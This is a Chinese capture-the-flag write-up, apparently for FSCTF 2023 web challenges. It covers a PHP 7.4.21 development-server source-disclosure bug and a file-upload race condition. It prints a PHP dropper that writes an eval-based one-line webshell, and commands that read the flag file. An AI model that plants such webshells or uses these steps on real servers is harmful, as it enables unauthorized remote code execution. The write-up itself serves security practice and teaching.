签到plus

dirsearch扫到文件shell.php

 可以看到php版本为7.4.21，这道题的话和今年羊城杯的一道题很像，都是利用PHP<=7.4.21 Development Server源码泄露漏洞 (https://buaq.net/go-147962.html)

然后我们就可以看到shell.php的内容

 将响应包的内容以txt文档保存后打开

 可以看到我们直接进行命令执行就可以了，传入???=cat /f*

加速加速

文件上传条件竞争

创建一个ctf.php文件

<?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?>

然后将此文件不断进行上传，并且不断访问/upload/ctf.php文件

 可以看到7.php一句话木马文件创建成功了，然后我们直接访问一句话木马进行命令执行就可以了。

cmd=system('cat /flag');

本栏目推荐文章
• 2023年度总结
• CSP-J/S 2023 游记
• Libevent [补档-2023-08-29]
• 本地套接字 [补档-2023-07-24]
• UDP通信 [补档-2023-07-22]
• 多路io复用Select [补档-2023-07-16]
• 多路io复用pool [补档-2023-07-19]
• 多路io复用epoll [补档-2023-07-20]
• socket编程 [补档-2023-07-10]
• OFBiz RCE漏洞复现（CVE-2023-51467）

FSCTF 2023fsctf 2023 沙箱fsctf 2023 fi3h 整数fsctf 2023 2str 赛道fsctf 2023 ez_eval fsctf 2023 eval 赛道crypto fsctf 2023 fsctf thinking pwntools工具fsctf 2023 2023 12